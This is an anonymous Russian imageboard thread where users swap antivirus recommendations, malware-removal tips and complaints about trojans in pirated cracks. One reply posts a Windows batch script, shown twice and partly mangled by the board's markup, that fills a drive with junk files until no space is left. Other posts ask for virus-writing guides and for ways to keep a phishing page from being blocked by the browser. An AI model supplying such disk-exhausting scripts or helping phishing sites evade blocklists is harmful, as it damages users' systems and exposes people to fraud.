Хорошо, ещё раз спасибо.
Подхватил вирус на флешку. Все файлф были скрыты и показаны ссылки. Эзет удалил вирус. Все файлы пропали. В свойсвах флешки они есть, путь показан как H/ /file.exe. Когда набираю вручную пробел - не заходить. Нужна помощь тех. кто сталкивался с этим.
В скрытых тоже нет, проверял.
Смотри в RECYCLE и в скрытых системных папках.
В системных лежал. Теперь форматну, для успеха.
Каким антивирусом или анти-малвэйр лучше защитить батю, который нажимает на все ссылки "скочать онлаин биз регистрации" и зоопорно. Торрент у него Медиагет, я ставил уторрент182, но он всё равно вернулся на медиагет, браузер опера, но реклама вон открыта через ярлык хрома.
Линуксом. Помогает справится с прослойкой перед креслом, кликающе куда не попадя, безотказно.
Ему батя после такого не уебёт?
Я бы тоже порекомендовал прыщи, но у твоего бати с непривычки может бомбануть. Мол, "А ХДЕ МОЙ ЗОНДОГОВНОТОРРЕНТ ПОЧЕМУ Я ЕГО ПОСТАВИТЬ НЕ МОГУ".
> я ставил уторрент182
А, допёр. Яблоко от яблони, хуле.
А, допёр. Яблоко от яблони, хуле.
Заблокируй запуск программ не из директорий Program Files и Windows.
https://habrahabr.ru/post/101971/
И сделай пользовательскую учётку с UAC.
Включи автоматическое обновление системы/браузера/flash. На браузер поставь uBlock с антималварь фильтрами.
Антивирус можно любой, Avira например.
>Торрент у него Медиагет
Сложно представить более мокрописечную и вирусоподобную софтину. Вычищай нахуй.
Бате скажи, либо включает моск, либо сидит с правами червя-пидора.
Что думаете вот про что - установить антивирус, например касперчега, и заблокировать ему в брандмауэре доступ в интернет. Обновления сигнатур ставить вручную ежедневно, ну не вручную а скрипт настроить.
Один профит же! И не следит, и от вирусов если что защищает
> и заблокировать ему в брандмауэре доступ в интернет
Обойдёт, сука. А если железно через роутер заблокировать - вообще работать не захочет. Уже проверено. Так что забей и лучше аваст накати, против 99,9% школоподелий помогает, а остальные и через каспера пролезут.
Посоветуйте хороший бесплатный антивирус, не жрущий много и не удаляющий без спроса то, чего не надо.
Тред аутистов каких-то, обсудили все, кроме антивирусов. Нахуя я свое время на этот тред проебал.
Спасибо, шалава.
Блять посоны. Меня уже несколько месяцев заебывает один вишмастер. Постоянно самоустанавливается из ниоткуда. Большинство популярных антивирусов его не видят. Периодически удаляю, но он появляется снова через 1-2 недели.
На вирус тотале он уже успел зашквариться. Вирустотал пишет что КОМОДО должен его детектить. Я установил КОМОДО, но нихуя. Комодо не видит. Как так?
Винду пока менять не хочу. Просто заебало. Нахуя нужны антивирусы если они говно чистить не хотят?
Кстати поясните за Икарус - норм антивирус?
На вирус тотале он уже успел зашквариться. Вирустотал пишет что КОМОДО должен его детектить. Я установил КОМОДО, но нихуя. Комодо не видит. Как так?
Винду пока менять не хочу. Просто заебало. Нахуя нужны антивирусы если они говно чистить не хотят?
Кстати поясните за Икарус - норм антивирус?
Кстати есть ли какой-нибудь быстрый легкий блокировщик процессов? Чтобы нихуя сильно не сканировал, а тупо висел и блокировал процессы из моего блэклиста?
А впринципе уже нагуглил. В винде оказывается можно банить процессы (!). Ахуел когда узнал.
Есть 2 варианта:
1. Без выяснения - запретить его использование средствами операционной системы:
панель управления -> администрирование -> Локальная политика безопасности -> Политики ограниченного использования программ, если пишет что не созданы - создать (действие, создать политику ограниченного использования программ (что там и написано) ) -> дополнительные права -> действие -> создать правило для пути, можно еще для хэша (запрещающие).
2. С выяснением причин:
завершить процесс, затем убрать из автозагрузки, посмотреть службы, дрова - неплохая утилита для этого Autoruns, если все-равно запуститься можно запустить FileMon как логгер при перезапуске - посмотреть кто открывает exe'шник (или что там) на выполнение (в висте не работает, в ней нужен Process Monitor - наверное тоже может работать как логгер, сам не проверял)
Есть 2 варианта:
1. Без выяснения - запретить его использование средствами операционной системы:
панель управления -> администрирование -> Локальная политика безопасности -> Политики ограниченного использования программ, если пишет что не созданы - создать (действие, создать политику ограниченного использования программ (что там и написано) ) -> дополнительные права -> действие -> создать правило для пути, можно еще для хэша (запрещающие).
2. С выяснением причин:
завершить процесс, затем убрать из автозагрузки, посмотреть службы, дрова - неплохая утилита для этого Autoruns, если все-равно запуститься можно запустить FileMon как логгер при перезапуске - посмотреть кто открывает exe'шник (или что там) на выполнение (в висте не работает, в ней нужен Process Monitor - наверное тоже может работать как логгер, сам не проверял)
Бля, спасайте, что делать с этой хуйней ?
Сама установилась, а так как она на японском я в душе не ебу как удалить. Сканировал нодом, на эту ёбу не реагирует, пытался удалить через "программы и компоненты" - нихуя не нашел ероглифов и поэтому хуй знает.
Олсо, вроде как то методом тыка удалось отключить оповещения, но сама хрень не пропала.
Сама установилась, а так как она на японском я в душе не ебу как удалить. Сканировал нодом, на эту ёбу не реагирует, пытался удалить через "программы и компоненты" - нихуя не нашел ероглифов и поэтому хуй знает.
Олсо, вроде как то методом тыка удалось отключить оповещения, но сама хрень не пропала.
не так страшно подцепить вирус, как подцепить китайский антивирус.
Это же утилита обновления до GNU/Linux 10, я бы обновился, Линус сейчас агрессивную политику ведет, так что в случае отказа весь твой диск будет зашифрован китайскими военными шифрами от компании Tencent. Серьезные ребята, полные сволочи, но за любые деньги готовы на что угодно.
Была такая хуйня на ноуте у мамки. Проблема в том что софт может быть и легальным. Антивирусы на него вообще не реагируют. Вроде лечится обычным удалением.
Бывает ещё на хуевых торрентах правообладатели создают карательные раздачи с этим говном. Дискредитируют и китайских разрабов, и отбивают желание пиратить дальше.
Бывает ещё на хуевых торрентах правообладатели создают карательные раздачи с этим говном. Дискредитируют и китайских разрабов, и отбивают желание пиратить дальше.
На каких ты торрентах софт ищешь? Игры во всем мире ломают две-три релиз группы. Идешь на их сайт и сравниваешь хэши с тем что скачал с васянотрекера.
Мокрые писечки бесплатно без ммс? Ну тогда страдай, спермовор, раз не можешь найти простую альтернативу.
Икарус говно.
Ты бы еще понос лечил пробкой в анусе.
Лол, репортирую дальше.. Удалось снести папку тенсент из програмфайлс одним кликом, но эта хуетень никуда не делась.. Решил погуглить в диске ц название и наткнулся на неудаляемую херь, что якобы используется в данный момент..
Думаю скачать этот антивирус поверх и просто снести потом, поможет ?
>На каких ты торрентах софт ищешь?
На любых блядь, ГТА 5 работающий кряк до 5 или 6го патча в любом месте был с трояном.
>поясните за Икарус - норм антивирус?
После перезагрузки компьютера папки сами полностью восстановились и снёс через унинст..
Вотъ.. Спасибо за наводку на тенсент.
что после удаления cure it/virus removal tool не оставляет чего-нибудь в системе.
Удаляешь cureit log, чистишь систему ccleaner или bootspeed, и чтоб наверняка очищаешь свободное место на диске, и будет тебе счастье.
>На каких ты торрентах софт ищешь?
На пиратбее ловил как-то раз. По тупости скачал раздачу с фингербоксом, который засрал мне систему китайским антивирусом. Не посмотрел на статус и масть юзера, который раздачу вбросил.
На торрентах с аутентификацией такой хуйни конечно нет. А вот на пиратбее такие атаки постоянно - вбрасывают фингербокс и накручивают ему 500 сидеров.
Что накатить на такую систему? За пк в основном сидит маман, по работе очень любит открывать 50+ вкладок пик2 - типичное состояние.
За фишинговые сайты не боюсь, фильтры в мюблоке настроены. Но есть The Bat!, на который регулярно приходит вирусняк в виде всяких форма_51.doc.exe, который я же регулярно удаляю, благо приучил спрашивать меня прежде чем открывать что-то новое. Сейчас нужно уехать, задумался об антивирусе. Сам последний раз им пользовался лет 5 назад, так что о современной расстановке сил на рынке я не знаю. Раньше было так: на мощный компьютер касперского, на слабый доктор веб, если бесплатный то авг или аваст. Проясните, изменилось ли что-нибудь с тех пор?
Ну и за всякие советы заранее спасибо.
За фишинговые сайты не боюсь, фильтры в мюблоке настроены. Но есть The Bat!, на который регулярно приходит вирусняк в виде всяких форма_51.doc.exe, который я же регулярно удаляю, благо приучил спрашивать меня прежде чем открывать что-то новое. Сейчас нужно уехать, задумался об антивирусе. Сам последний раз им пользовался лет 5 назад, так что о современной расстановке сил на рынке я не знаю. Раньше было так: на мощный компьютер касперского, на слабый доктор веб, если бесплатный то авг или аваст. Проясните, изменилось ли что-нибудь с тех пор?
Ну и за всякие советы заранее спасибо.
Если готов заплатить, то Доктор Вэб, почтовый сканер есть в расширенной версии - Security Space. Без фаервола, иначе она охуеет. Лучше виндовый жестко настроить, чтобы пропускал по белому списку только нужные программы.
Если платить не готов, то любой. Особой разницы в защите между антивирусами нет. У кого-то больше ложных срабатываний, у кого-то меньше. У кого-то больше маркетинговых и бесполезных фич, у кого-то меньше.
Просто, по возможности снеси всякие java, сильверлайт, адоб ридер, если они не являются необходимыми для работы. Если необходимы, хотя бы отключи их плагины в браузерах.
SmartScreen виндовый тоже я бы включил. Маман на приватность похуй, а во многих случая заблокирует зверьё всякое.
Да, и сразу AmmyAdmin ей скачай куда-то, и пропиши в фаерволе разрешения. В случае чего сможешь подключиться помочь быстро.
Ого, спасибо за такой развёрнутый ответ. На жабе и интернет эксплорере, лол к сожалению анально завязан её корпоративный сайт, так что без него никак, а вот смартскрин включил.
Пока накатил кашперский фри, при запуске программы на мгновение загружает проц на 40-50%, в общем приемлемо.
>AmmyAdmin
Есть какие-то принципиальные отличия от TeamViewer?
> Есть какие-то принципиальные отличия от TeamViewer?
Принципиальных отличий, наверное, нет. Пользуйся TeamViewer'ом.
В какой-то момент TeamViewer меня забанил из-за анальных ограничений по времени (хотя не так часто я им и пользовался), у ушел на AmmyAdmin и не пожалел. внезапно стало еще удобнее, потому что AA состоит из одного файла, которому и нужно было давать разрешения в фаере. А TeamViewer создавал свои файлы где-то в ебенях в AppData, их приходилось искать чтобы разрешить. У меня фаервол блокирует все, что не разрешено, без алертов. Это было несколько лет назад, а сейчас я удаленной помощью уже не занимаюсь, поэтому не знаю.
У aa тоже анальное ограничение по времени. Пользуйте nomachine.
Твое мнение очень важно для нас.
Ты чего раскудахтался, дебил? Эта хуйня решает ваши нищебродские пердопроблемы с тайм-лимитом, никто там тебя, кретина, не забанит.
>жрать говно
>NoMachine
Revo uninstallerом удаляешь под корень всё, чего сам не ставил там куча всякого говна, браузеры-хуяузеры, игровые центры и подобная шелупонь и гуглишь anti-malware проги, лучше сразу несколько. И чистишь-чистишь вилкой. Будь готов к тому, что эта залупа как гидра - убил одну хуйню, вылезло ещё три.
Я уже хуй знает сколько лет не встречал ВИРУСОВ в классическом понимании, тех, которые ловят антивири. А всякое малвейр говно антивири нихуя не ловят, тут нужно внимательно смотреть, что устанавливаешь и в случае чего оперативно чистить вилкой, тем же Рево. А антивирусы в основном тупо дрочат и блокируют КРЯКЕНЫ к игрушкам. Короче, на винду давно перестал ставить антивири, по мне, так они просто тупо отжирают ресурс, да ещё и инфу сливают хуй знает какую хуй знает кому.
>Я уже хуй знает сколько лет не встречал ВИРУСОВ в классическом понимании, тех, которые ловят антивири.
>проецирует свой частный опыт на весь массив
Кряк игры небось
У меня тоже всякие петушиные антивирусы обнаруживали каждый КРЯК. Как будто я сам, блядь, не знаю, сколько у меня их. Хуету ты какую-то принёс, хоть бы реальную бациллу показал, а не пидарский Gen. И да, схуя мне проецировать, я просто выразил своё мнение, можно сказать, поделился опытом. Кстати, ещё мой опыт подсказывает мне, что есть три категории пользователей - первые полные дауны, и это не исправят никакие антивирусы, у этих всегда система забита всякими амиго и тоннами рекламного дерьма. Вторые - мнительные долбоёбы вроде тебя, у таких стоит зачастую НЕСКОЛЬКО антивирусов и НЕСКОЛЬКО фаерволов. Такие мнят себя дохуя спецами по безопасности, хотя все их навыки заключаются в установке антивирусов и просмотре с умным еблом отчетов о пойманных Хактулах. И ходят легенды о третьей категории - юзерах, которые достаточно внимательны, чтобы не ставить дерьмо и не ловить мэлвэйр без всяких антивирусов, и изредка следят за процессами,пресекая на корню любую подозрительную деятельность. Без всяких антивирусов и прочих костылей, нужных только для самоуспокоения быдла.
Аноны, поясните, что поставить лучше? Понимаю, что все антивирусы сплошные зонды, может у кого-то щупальца просто потоньше? Думаю над нод32. Может еще что-то посоветуете? Как авира?
ноуп.жпег, там с "проверенного временем невасянотрекера" набор нюдпатчей для игорь, всякие рандомные утилиты хуй пойми откуда и еще что-то. но тащемта кряки-хуяки весьма часто содержат дроперы. Про "здравый смысл и ваще нехуй ператки и торренты качать" - вот сразу нахуй идите, я компьютер покупал не для того, чтобы кроме браузера нихуя не использовать.
>обнаруживали каждый КРЯК
Ну тащемта на пикче tr/black.gen2 это троян. Пидорский он или нет я не знаю. Все абсолютно все кряки к ГТА5 до 5 или 6го патча был с трояном например. И тут у тебя два стула. Весь твой высер не читал, потому что очевидно что ты долбоеб.
https://www.shadowserver.org/wiki/pmwiki.php/AV/Virus90-DayStats
именно по детекту и детекту в ретраях у авиры очень высокие показатели, проблема в том что поведенческого анализа там нет. поставь битдефендер, в крайнем случае он будет твое цп не трщмайорам носить а НСА, а им до тебя нет дела.
а что такое ретрай?
и чому касперского там нет?
>Все абсолютно все кряки к ГТА5 до 5 или 6го патча был с трояном например
И что же делали эти страшные трояны? Почему ты вообще отнёс их именно к троянам? Ты вообще в курсе, что такое троян?
Ах да, тебе же очевидно, что я долбоёб. Ну-ну.
Перечисли эти сайты, плес.
>И что же делали эти страшные трояны?
Не знаю, я не занимаюсь препарированием троянов
>Почему ты вообще отнёс их именно к троянам?
Потому что
>Ты вообще в курсе, что такое троян?
Нет, да, какая вообще разница что я отвечу, ты же долбоеб, которому в ебальник будут тыкать шифровальщиком, который подхватил такой же любитель предохраняться методом "вовремя вытаскивая и не пихая куда не надо" а он будет визжать "ПРОСТО У ТЕБЯ НЕДОСТАТОЧНО ЗДРАВОГО СМЫСЛА, ТЫ НЕ ЭДВАНСЕД ЮЗЕР!"
Раньше был, потом выпилили. АВ движок кашперскаго стоит в fsecure, может из-за этого. Может сами решили убрать, может еще хуй знает почему. Можешь написать им письмо и спросить, если очень интересно. После того как касперский стал заменять все ssl сертификаты на свои рутовые я резко потерял к нему интерес.
> Нет, да, какая вообще разница что я отвечу, ты же долбоеб, которому в ебальник будут тыкать шифровальщиком, который подхватил такой же любитель предохраняться методом "вовремя вытаскивая и не пихая куда не надо" а он будет визжать "ПРОСТО У ТЕБЯ НЕДОСТАТОЧНО ЗДРАВОГО СМЫСЛА, ТЫ НЕ ЭДВАНСЕД ЮЗЕР!"
V I R U S T O T A L
I
R
U
S
T
O
T
A
L
мокрописечник ебаный
Прдлагаешь папочку на пару десятков гигов, выкачаную сидбоксом, закинуть на вирустотал? А ты не охуел ли?
Предлагаю не качать мокрописячные репаки. Сами кряки весят мало.
Антивирусы просто детектят кряки, потому что они продажные свиньи.
А что заставляет тебя верить, что помимо кряка тебе не засунут пару бэкдоров?
>сами кряки весят мало
Как быть, если я не кряк качаю?
>Ну тащемта на пикче tr/black.gen2 это троян.
Залей его на вирустотал, посмотрим, что там у тебя за страшный и ужасный троян такой.
Эмпирическая закономерность: не суют. Релизеры просто не этим занимаются.
Ты правда думаешь я все это храню?
black.gen2 это ласт детект, перед этим там было еще овердохуя детектов дропперов.
Не стоит. F-secure тоже использует движок BitDefender.
Лел, открываю любую раздачу чего угодно, читаю диалоги навроде
-Там троян вирустотал/10
-Кококо только у даунов не работает, выключайте антивирус и ставьте,у меня все работает!
-Интересно на это кто то еще ведется в 2016?
-Кококо антивирусы давят пиратов, там просто зашиврованый кряк чтобы его не нашли кокок!
-Яснопонятно
Закрываю сайт
> кроме браузера нихуя не использовать
Я бы наоборот запретил себе браузером пользоваться, всё зло от интернета. Раньше в фидо попроще было. Купил фаллаут в магазе, HEXы в сохранёнке подправил и играй себе читер-ебучий.
>всё зло от интернета
ты забыл о замечательном времени, когда все зло было от юсб флешек
Хочу обмазаться nod32 smart security. Как оно?
Как земля.
Долбоёб? Долбоёб.
>я не занимаюсь препарированием троянов
>какая вообще разница что я отвечу
>нихуя в теме не шарю, но буду кукарекать громче всех с видом специалиста мирового уровня
Ясно.
скачал Авиру
прошло уже минут 15, до сих пор идет установка
мммм вкусна блять)))) нет, идите нахуй
прошло уже минут 15, до сих пор идет установка
мммм вкусна блять)))) нет, идите нахуй
В ядро встраивается, перекомпилирует. Жди.
Мне админы на работе сказали, что любой бесплатный антивирус, это ботнет с майнером.
Врут?
Врут?
Они забыли добавить, что любой платный антивирус - это ПЛАТНЫЙ бот с майнером.
Добавил тебе в ротан.
мимоадмин
Аноны, хз куда написать. Насколько возможно влезть между клиентом и почтовым серваком, чтобы читать почту, а потом пересылать её куда-надо? Звучит как полная хуета, я понимаю. Но босс истерит, что если письмо отправили в 13-40, а приходит оно в 14-30, то его спиздили, прочитали и отправили боссу. Скажите мне, что я прав и это всё происки ебанутого mail.ru
> mail.ru
Можешь успокоить босса, mail.ru могут читать его почту и без задержки.
Можно ли в eset smart security несколькими кликами добавить правило файервола для приложения? В аутпосте можно через монитор соединений нажать правой кнопкой по процессу и создать для приложения правило? В эсете можно так?
Много лет сидел на авг фри. Сегодня переставил винду и вспомнил, что батя купил себе нод32 на год и мне ключ предложил. Поставил себе лицензию нод32 до конца года. Всё правильно сделал?
анон, подскажи что за бред творится - пару дней назад начали появлятся запросы c просьбой вводить капчи ( от cloudflare ) при вхожденнии на сайты. помоги пожалуйста пофиксить .
(ОS Linux arch)
(ОS Linux arch)
Но зачем антивирус?
Смени провайдера, твоя подсеть ЗАШКВАРЕНА ботнетом.
>Вторые
Мне тут как раз попался один такой
Антивирус и спермоклоун это тождественные понятия
Я вынужднен пользоваться этой сетью провайдера технически сменить не получиться. подскажи как в таких условиях пофиксить?
VPN/proxy, но только элитно-платные, остальные что дешёвые или бесплатные тоже зашкварены ботами.
спасибо Анон, может у тебя на есть примете какой то годный VPN/Proxy??
Вчера обнаружил тухлую программу Browser Tab Search by Ask, и решил просканить пеку доктором. Была найдена всего 1 угроза, которую я вылечил (правда путь проебал, ну ладно), но сегодня решил на всякий просканить пеку еще раз и было обнаружено 23 угрозы и все они связаны либо с I Like It Extension, либо с Browser Tab Search by Ask. Все эти дела и все, что с ними связано, снес. Потом сходит в реестр, поискал останки и тоже снес, но блядская папка Browser Tab Search by Ask все так же висит в програм фалосе, правда всего с одним файлом safetycrt.dll. Когда попытался удалить, вылезло предупреждение, что он связан с действующим процессом winint.exe, но вот только при попытке вырубить процесс, выскакивает предупреждение о завершении работы системы. Погуглил - пишут что при его отрубе система таки завершается. Ну и как быть? Вы наверное уже догадались что я немного нуб, поэтому прошу сильно не пиздить.
PureVPN
Отправь оставшийся файл в вирлаб доктору, это же очевидно.
смотрю его нет под linux.
можешь посоветовать под linux ?
openvpn
Какая то хуевая идея, я проверил пеку на вирусы в третий раз и уже ничего не нашел, но завтра еще разик проверю.
Спасибо, как то сразу не подумал поебать им мозги, оказывается у них даже по телефону техподдержка есть.
Это была наполовину шутка. С одной стороны да, почему бы и не поделиться с ними компонентом нежелательного ПО, который они еще не детектят. Написать, что это неудаляемая часть ASK тулбара.
С другой стороны, это эникейство. А как тебе помочь отсюда я не знаю. Я бы скриптом удалил. А тебе может там Unlocker скачать. Но сам я очень не люблю устанавливать лишний софт.
Чет боюсь я всех этих программ уже, опять какое нибудь дерьмо еще подцеплю. Ладно, подожду пока что они там ответят, а завтра на всякий еще раз проверю файл. Может быть так, что он в общем то безопасен, поэтому доктор на него не реагирует?
Хуёвая идея это то, что у тебя в голове сейчас.
Скомпрометировання система подлежит переустановке из бекапа, точка.
Он и так безопасен как и весь Ask toolbar. Но ты же его удалил. У них какая категория есть - нежелательное ПО.
Буду перекатываться только на про-шиндовс, а пердолиться с пиратками не вижу смысла, такие же дырявые.
Про-шиндовс 10 конечно.
Kaspersky Free или Bitdefender Free?
> Bitdefender Free
this. Не подменяет сертификаты и вообще няша
Стоит НОД с фиксом mara-fix 1.8 Откуда мне знать что через эту парашу(фикс) Васян из соседнего подъезда не шурует у меня в очке раскаленной кочергой? Это касается всех "фиксов и кряков". Откуда такое доверие к ним. Не лучше ли тогда поставить какую-нибудь бесплатную авиру?
Ладно еще батник какой-то был чистящий реестр для сброса триала каспера когда-то... но тут же хуй в мешке.
Ладно еще батник какой-то был чистящий реестр для сброса триала каспера когда-то... но тут же хуй в мешке.
>Но сам я очень не люблю устанавливать лишний софт
>Чет боюсь я всех этих программ уже, опять какое нибудь дерьмо еще подцеплю.
Что с вами не так, ананасы?
https://ru.wikipedia.org/wiki/Sandboxie
Virustotal+(NTFStoFAT32WizardRusPortable) Аноним (Microsoft Windows XP: Old Opera) 27/04/16 Срд 04:05:20 #483 №1686840
При проверке сабжевого софта (файла) на Вирустотал -- пара антивирусов там (не Касперский, не ДрВеб, а не помню какие-то малоизвестные) ругнулись, что в файле бэкдор. Остальные 50 или сколько-там, говорят все ОК. Ну я таки запустил файл, все работает, вроде в инет не пытается лезти, и прочих признаков зловреда не подает. Но всеж стремновато, если там и вправду хитрый бэкдур, позаразит же мне все компы и флешки.. Насколько можно доверять Вирустоталу? Софтинка, что скачал -- малопопулярная, ибо мало кому в 2016 надобно конвертить раздел NTFS в FAT32 без копирования и создания заново раздела.. Качал оттуда -- sorus.ucoz.ru/forum/70-34153-1, чел вроде ее русифицировал и главное -- портабельную версию сделал.
MiniTool Partition Wizard
Спасибо. Попробовал, вроде ничего, но он же не имеет абсолютно никаких настроек! Я понимаю, лучший в мире антивирусный движок за бесплатно, но как-то же надо настраивать исключения, с карантином работать, проактивной защитой управлять.
Спасибо! Охх, но этот совсем нерусский, интересно что будет с русскими именами файлов/папок, в NTFS они же в юникоде, а в FAT32 в чем не знаю (1251?) Сорри за "оффтоп".
Вообще, есть ли действительно годный антивирус, который не висит круглые сутки в фоне со своей ЗАЩИТОЙ В РЕАЛЬНОМ ВРЕМЕНИ, а по запросу аккуратно и тщательно проверяет систему на предмет наличия троянов/ботнетов? Само собой, бесплатный, хотя я сомневаюсь, что такая хуета бывает платной.
Я просто тут подумал, что на сперме четыре года без антивирусника сидеть немного опасно, и систему нужно периодически проверять.
Можешь свежий CureIt каждый раз качать.
Можешь какую-нибудь облачную Zemana Anti-Malware поробовать. Но ты же мамкин анонимус, ты не позволишь каким-то там антисоветским туркам гулять у тебя на заднем дворе, если вы понимаете о чем я.
А что, этот ваш cureit по задним дворам прогуливается?
Отправляет статистику хозяину. Но это пресекается весьма банально - отключением интернетов на время его работы.
Как это говно выпилить?
Используй правильный софт, например
https://technet.microsoft.com/en-us/sysinternals/processexplorer.aspx
он показывает откуда что запущено.
Зачем выпиливать такую няшность. Я бы и себе поставил, но не знаю как.
когда руки из плеч, всё можно увидеть в обычном эксплорере, нажав на процесс правой кнопкой.
любой тащемта или почти любой
нажав на процесс правой кнопкой ты нихуа не увидишь, кроме вкладки "подробности", на которой ты опять таки нихуа не увидишь кроме пида\овнера\загрузки цп и рамы
Реквестирую ВИРУСОВ которые ложат оперативку в bat или vbs
В перекате укажите консенсус к которому таки пришли.
@echo off
setlocal enabledelayedexpansion
set /a sizofile=1024 1024 1024
for /l K in (1,1,256) do (
for /f "tokens=3" J in ('dir %~d0 /-C') do (set freespace=J)
if !freespace! EQU 0 goto ready
if !freespace! GTR !sizofile! (
call :getime
fsutil file createnew "%~d0\[ 1024 Mb ] !randtime!" !sizofile!
) else (
for /l K in (1,1,5) do (
for /f "tokens=3" J in ('dir %~d0 /-C') do (set freespace=J)
set /a sizofilemb=!sizofile! / 1024 /1024 / 2
set /a sizofile=!sizofile! / 2
if !freespace! GEQ 67108864 (
if !freespace! GEQ !sizofile! (
call :getime
fsutil file createnew "%~d0\[ !sizofilemb! Mb ] !randtime!" !sizofile!
)
) else (
if !freespace! EQU 0 goto ready
call :getime
fsutil file createnew "%~d0\[ 1-63 Mb ] !randtime!" !freespace!
goto :EOF
)
)
)
)
:getime
set randtime=!time:~-10!
set randtime=!randtime::=!
set randtime=!randtime:,=!
exit /b
[CODE]@echo off
setlocal enabledelayedexpansion
set /a sizofile=1024 1024 1024
for /l K in (1,1,256) do (
for /f "tokens=3" J in ('dir %~d0 /-C') do (set freespace=J)
if !freespace! EQU 0 goto ready
if !freespace! GTR !sizofile! (
call :getime
fsutil file createnew "%~d0\[ 1024 Mb ] !randtime!" !sizofile!
) else (
for /l K in (1,1,5) do (
for /f "tokens=3" J in ('dir %~d0 /-C') do (set freespace=J)
set /a sizofilemb=!sizofile! / 1024 /1024 / 2
set /a sizofile=!sizofile! / 2
if !freespace! GEQ 67108864 (
if !freespace! GEQ !sizofile! (
call :getime
fsutil file createnew "%~d0\[ !sizofilemb! Mb ] !randtime!" !sizofile!
)
) else (
if !freespace! EQU 0 goto ready
call :getime
fsutil file createnew "%~d0\[ 1-63 Mb ] !randtime!" !freespace!
goto :EOF
)
)
)
)
:getime
set randtime=!time:~-10!
set randtime=!randtime::=!
set randtime=!randtime:,=!
exit /b[/CODE]
Ебучая макаба.
> укажите консенсус к которому таки пришли
Да все как обычно, пришли к тому, что ОП - хуй. Это же харкач.
спасибо, но нахуя кидать в спойлер?
%-поставил
почему его не детектит антивирусы? открывать ебал
Открыл без админки и со включенным DEP. Так и должно быть?
Спойлер проебал там весь код. Так что забей.
И, да, без админки не сработает.
А ещё, чем больше объём винта тем больше грузит оперативку.
> почему его не детектит антивирусы?
А почему должен? Он выполняет вполне разрешённые действия.
Насколько я знаю в разметке просто 2%спойлер2%, я их подоставлял в коде, разве мало?
Ну так запусти от админки, первые 10 секунд сможешь вырубить, если заработает.
Везде %% заменил?
Какже заебала капча в тематике, мод, что за хуйня?
Которые ЧТО делают?
1. Нет антивируса.
2. Отключены обновления системы и всех программ, кроме браузера.
3. UAC переведён в параноидальный режим.
4. Пароли хранятся в KeePass - в браузере отключено запоминание паролей.
5. Браузер запускается только из песочницы.
6. Любые скачанные программы запускаются из песочницы без доступа к интернету.
7. Сейчас ещё ебусь с файрволлом - нужно разрешить доступ в сеть только браузеру и торренту из песочницы.
Что ещё забыл?
2. Отключены обновления системы и всех программ, кроме браузера.
3. UAC переведён в параноидальный режим.
4. Пароли хранятся в KeePass - в браузере отключено запоминание паролей.
5. Браузер запускается только из песочницы.
6. Любые скачанные программы запускаются из песочницы без доступа к интернету.
7. Сейчас ещё ебусь с файрволлом - нужно разрешить доступ в сеть только браузеру и торренту из песочницы.
Что ещё забыл?
Сап, анон. Познакомился со стилерами и прочим года 4 назад и с тех пор не качаю и не запускаю всякие кряки хуяки и прочие левые экзешники. Антивирус никогда не стоял, только раз в пару месяцев делаю проверку курейтом - все чисто.
Сейчас же у меня возникли подозрения, что где-то что хаванул (хотя вроде как обычного ничего не качал и не запускал) по типу полного наблюдения за моим рабочим столом, вполне возможно что просто паранойя, но хотелось бы убедиться до конца. Как обычно чекал курейтом и все чисто, пару анализов на майлвары - чисто. Решил обмазаться говно и скачал касперский ради проверки, потом сношу. Посоветуйте что-нибудь имбовое, чтоб нашел все трояны, если такие есть, которые не видит курейт. Спасибо.
Сейчас же у меня возникли подозрения, что где-то что хаванул (хотя вроде как обычного ничего не качал и не запускал) по типу полного наблюдения за моим рабочим столом, вполне возможно что просто паранойя, но хотелось бы убедиться до конца. Как обычно чекал курейтом и все чисто, пару анализов на майлвары - чисто. Решил обмазаться говно и скачал касперский ради проверки, потом сношу. Посоветуйте что-нибудь имбовое, чтоб нашел все трояны, если такие есть, которые не видит курейт. Спасибо.
>Что ещё забыл?
сходить к провайдеру и сказать, что больше не нуждаешься в интернете и требуешь тебя отключить.
> Что ещё забыл?
Сходить к психиатру.
Анон, я обосрался или все в порядке? Гугл внятно не объяснил за каждый троян, в др. вебе датированы 2014 год
добавлю, что host сам редактировал, там ничего нет
Что за песочница?
Поясни еще пожалуйста за пердолингом безопасности шиндовс 7. Имеет смысл работать с ней, так еще и пиратом? Какие подводные?
Sandboxie
Удаляешь ненужные службы (обновление и т.д.), отключаешь телеметрию, используешь wipfw в параноидальной режиме ☻→ Профит.
>даляешь ненужные службы (обновление и т.д.),
Так ты гайд пилишь, а вопрос несколько о другом был.
Господа, проконсультируйте, пожалуйста.
Принёс домой на флешке червя FakeDoc.A
Открыл на своей пеке и вижу, что вордовские документы, превратившись в екзешники, стремительно удаляются на моих глазах антивирусом. Сканируя отдельно флешку он их не находит, лишь только когда я сам непосредственно нахожу такой файл - он его удаляет. Вродь флешка чиста теперь.
Но вот только одно меня мучает: не мог ли этот пидор на компьютер с флехи перебраться?
Принёс домой на флешке червя FakeDoc.A
Открыл на своей пеке и вижу, что вордовские документы, превратившись в екзешники, стремительно удаляются на моих глазах антивирусом. Сканируя отдельно флешку он их не находит, лишь только когда я сам непосредственно нахожу такой файл - он его удаляет. Вродь флешка чиста теперь.
Но вот только одно меня мучает: не мог ли этот пидор на компьютер с флехи перебраться?
Мог.
P.S. Спасибо, Абу, за этот ебучий тест Тьюринга. Пидор.
Пожалуйста, киньте гайды/сайты с инструкциями по созданию вирусов, спасибо.
> вирусов
Если только "кроликов".
Что за кролики?
Или это не популярно/прибыльно/сливать стоящую инфу, рассказывать кулхацкерам процесс создания.
Или это это скрывается, нужно попасть в узкоспециализированный круг как на сайте эксплоит?
Есть ли способ это проверить, прежде чем моя система улетит в ебеня?
Хром не пускает на фишинговую страницу, уведомляя об опасности.
Нужно, чтобы пускал.
Отключение индексации, и смена домена решат проблему?
Или это можно сделать как-то проще?
Нужно, чтобы пускал.
Отключение индексации, и смена домена решат проблему?
Или это можно сделать как-то проще?
> Firefox based
Ты уже сделал.
Знают взрослые и знают дети. Знают маленькие и большие.
Знают негры и бледнолицые, краснокожие и голубые.
Сижу с дашчана, лол.
Блочат вообще все браузеры. Им эти данные передаются от поисковиков.
Значит ли что отключение индексации сайта решит проблему?
Я вообще не знаю, что такое индексация браузера.
В десктопном FF вот эта опция отвечает за отключение проверки сайтов по спискам гугла. У меня смартфона никогда не было, поэтому я не знаю какие там настройки.
> индексация браузера
> индексация сайта
Проебался, но но все равно не знаю что это.
